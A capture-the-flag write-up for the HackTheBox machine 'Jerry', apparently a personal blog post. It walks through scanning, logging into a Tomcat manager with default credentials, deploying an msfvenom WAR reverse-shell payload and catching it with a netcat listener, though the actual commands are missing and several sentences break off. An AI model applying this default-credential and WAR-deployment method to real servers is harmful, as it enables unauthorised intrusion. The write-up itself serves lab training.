Jerry is a Windows-based CTF from HackTheBox.
Attempted to browse to host, but no response.
Confirmed host is alive with ping.
Makes approach a little narrower. Lets jump directly into scanning.
Couldn't browse to host.
Perhaps there are other interesting services.
Initial nmap scan failed, as if host were down.
Ran nmap with
-Pn flag instead, worked.
After finding a single service, I further scanned to enumerate the service.
This was also obvious after browsing to the IP.
It's a tomcat service.
Didn't find anything more unfortunately, so looks like Tomcat is what we're attacking today.
Fortunately, I've got a little experience attacking tomcat.
In previous CTFs I've come across a few versions. Most require us to access the tomcat manager modules.
Lets try find the exact version of Tomcat that the system is using, and whether we can get simple access.
Browse to host
Version is show atop the page.
Access manager app
Clicking around, I found the manager application.
As usual, it requests a username and password.
Whichever genius set up this installation is using default credentials.
Which allows us to login.
We can access both the status and the HTML directory.
We can likely access more but these links are accessible from homepage.
Find potential attack vector
I searched around for somewhere to upload a payload.
We can upload WAR files to the server via the /manager/html page.
See the Deploy section.
MSFVenom WAR payload
We can generate a payload with
To run, we need a Java/JSP payload, in WAR file-format.
Tomcat is java-based, and runs JSP files.
Now we have a payload, lets upload(deploy) it. You'll notice after you Browse, select your payload, then Deploy. Another record is attached to application list.
The application will take on the name of the WAR file you deployed.
To access and execute the reverse shell, simply browse to the URL. In the above case, we need to browse to
/shell, as we uploaded
But, before we execute the shell we need to start a listener for our reverse shell.
We'll use netcat listening on
After starting listener, navigate to the exploit path.
This will give use shell
Getting user & root flag
Now that we have shell we can look around for more info.
This system is pretty poor in terms of security. Tomcat must be running as Administrator, as we're able to navigate directly to the Administrator /Desktop directory and pull the flags. The flag file gives us both the user flag and the root flag!
And there we have it. Jerry complete.